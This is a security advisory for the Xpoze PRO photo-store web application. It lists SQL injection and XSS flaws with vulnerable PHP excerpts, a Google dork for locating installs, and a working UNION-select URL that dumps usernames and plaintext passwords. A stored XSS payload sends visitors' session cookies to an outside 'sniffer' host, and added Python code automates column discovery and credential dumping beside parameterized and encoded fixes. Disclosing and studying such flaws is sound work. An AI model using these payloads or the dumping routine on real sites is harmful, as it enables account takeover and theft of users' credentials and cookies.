Application: Xpoz PRO (Expoze Photo Store)
Website: http://xpoze.org
Version: All (current 1.0)
About: Xpoze is an easy-to-use photo store with many features that help buyers and sellers find or sell images according to their needs.
Googledork: Powered by Powered by Xpoze.org
Date: 01-07-2008
Description:
Multiple vulnerabilities: SQL injection, blind SQL injection, and active (stored) and passive (reflected) XSS.
[ SQL-INJECTION ]
Some examples:
http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
http://host/video.html?limiter=0&c=1[SQL]
And other vulnerable files:
—————————
// $p=[admin, editor, user, photo]
[ members/$p/edite.inc ]
// excerpt: $delete and $hash are interpolated into the queries without escaping
if (isset($delete)) {
$ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error());
$row = mysql_fetch_assoc($ph);
$url = "../photos/".$row['photo'];
$thumb_url = "../thumbs/".$row['photo'];
mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());
$ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());
[ members/$p/editp.inc ]
$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());
[ include/img.rating.php ]
$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error());
$rates = mysql_num_rows($rat);
ETC…
===>>> Exploit:
http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*
(!) Passwords are stored in the database in plaintext (!)
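The following Python model of the injection above is an added example, not code from the advisory or from Xpoze. It uses an in-memory SQLite database with a constructed, assumed schema (only the `user` and `pass` column names come from the page) and mirrors the PHP pattern of splicing a request value into the query text. It shows the three steps the user.html payload relies on: finding the column count with `UNION SELECT NULL,...`, padding the payload to that width, and walking the `users` table one row at a time with `LIMIT n,1`, plus the bound-parameter form that defeats it. Function names are the example's own.

```python
import sqlite3

# Constructed in-memory stand-in for the Xpoze `photos` and `users` tables.
# The real schema is not on the page: `user` and `pass` are the columns the
# advisory's UNION payload reads; every other column here is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users  (id INTEGER, user TEXT, pass TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', 'adminpw',    'admin@host'),
                                 (2, 'alice', 'wonderland', 'alice@host');
        CREATE TABLE photos (id INTEGER, owner INTEGER, photo TEXT, title TEXT);
        INSERT INTO photos VALUES (1, 2, 'f1.jpg', 'Sunset');
    """)
    return con

def photo_by_id_vulnerable(con, pid):
    # Model of editp.inc: the request value is spliced into the SQL text, so a
    # single quote in `pid` ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, owner, photo, title FROM photos WHERE id='{pid}'"
    return con.execute(sql).fetchall()

def photo_by_id_safe(con, pid):
    # Hardened form: a bound parameter is sent as data and never parsed as SQL.
    return con.execute(
        "SELECT id, owner, photo, title FROM photos WHERE id=?", (pid,)
    ).fetchall()

def find_column_count(con, query, max_cols=64):
    # Grow `UNION SELECT NULL,...` until the database stops raising a
    # column-count mismatch; the real payload must match that width
    # (the advisory's user.html payload is padded with 1s for the same reason).
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            query(con, f"-1' UNION SELECT {nulls}-- ")
            return n
        except sqlite3.OperationalError:
            continue
    return None

def dump_credentials(con, query, ncols):
    # Same shape as the advisory payload: pad with 1s, put user/pass in two of
    # the slots, and walk the users table one row at a time with LIMIT n,1.
    # id=-1 makes the legitimate SELECT return nothing, so only our row comes back.
    creds = set()
    row = 0
    while True:
        cols = ["1"] * ncols
        cols[1], cols[2] = "user", "pass"
        payload = f"-1' UNION SELECT {','.join(cols)} FROM users LIMIT {row},1-- "
        rows = query(con, payload)
        if not rows:
            return creds
        creds.add((rows[0][1], rows[0][2]))
        row += 1

if __name__ == "__main__":
    con = make_db()
    n = find_column_count(con, photo_by_id_vulnerable)
    print("columns:", n)
    print("leaked:", dump_credentials(con, photo_by_id_vulnerable, n))
    print("safe:", photo_by_id_safe(con, "-1' UNION SELECT 1,user,pass,1 FROM users-- "))
```

The trailing `-- ` comment plays the role of the `/*` in the page's payload: it swallows the closing quote the application appends. Against the vulnerable function the leaked `pass` values are usable as-is, which is why the plaintext storage noted above turns a read-only injection into full account takeover.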
[ ACTIVE XSS ]
The forum does not filter the topic title and message body fields.
===>>> Exploit:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
[ PASSIVE XSS ]
http://host/?tpl=[XSS]
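As an added example (not code from the advisory or from Xpoze), the Python below models both XSS cases: the unfiltered forum fields (stored) and the echoed `tpl` parameter (reflected), each beside its output-encoded form. The stored input is the cookie-stealing payload from the section above; the `tpl` rendering context is not on the page, so the quoted-attribute model and its break-out payload are assumptions, chosen because attribute context is where plain entity encoding without quote escaping still fails.

```python
import html

# Constructed sample inputs. STORED_PAYLOAD is the advisory's cookie-stealing
# script used as a forum message body; REFLECTED_PAYLOAD is an assumed
# attribute break-out for ?tpl=, whose real rendering context is unknown.
STORED_PAYLOAD = ('<script>img = new Image(); '
                  'img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>')
REFLECTED_PAYLOAD = '"><script>alert(document.cookie)</script>'

def render_post_vulnerable(subject, body):
    # Model of the unfiltered forum page: both fields dropped into the HTML as-is.
    return f"<h2>{subject}</h2>\n<div class=\"msg\">{body}</div>"

def render_post_safe(subject, body):
    # Hardened form: entity-encode untrusted values for element-content context.
    return (f"<h2>{html.escape(subject)}</h2>\n"
            f"<div class=\"msg\">{html.escape(body)}</div>")

def render_tpl_vulnerable(tpl):
    # Assumed model of ?tpl=: the value echoed inside a quoted attribute.
    return f'<input type="hidden" name="tpl" value="{tpl}">'

def render_tpl_safe(tpl):
    # Attribute context: quote=True also encodes " and ', so the value cannot
    # close the attribute and start a new tag.
    return f'<input type="hidden" name="tpl" value="{html.escape(tpl, quote=True)}">'

def has_script_tag(markup):
    # Crude indicator for the checks below: an unencoded <script> tag survived.
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_post_vulnerable("hello", STORED_PAYLOAD))
    print(render_post_safe("hello", STORED_PAYLOAD))
    print(render_tpl_vulnerable(REFLECTED_PAYLOAD))
    print(render_tpl_safe(REFLECTED_PAYLOAD))
```

Encoding at output time, per context, is the fix for both variants; stripping `<script>` from input is not, because the same data can be re-injected through other fields or bypassed with other tags. Marking the session cookie HttpOnly would blunt this particular `document.cookie` exfiltration but does not remove the XSS.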
PHPInfo – http://host/info.php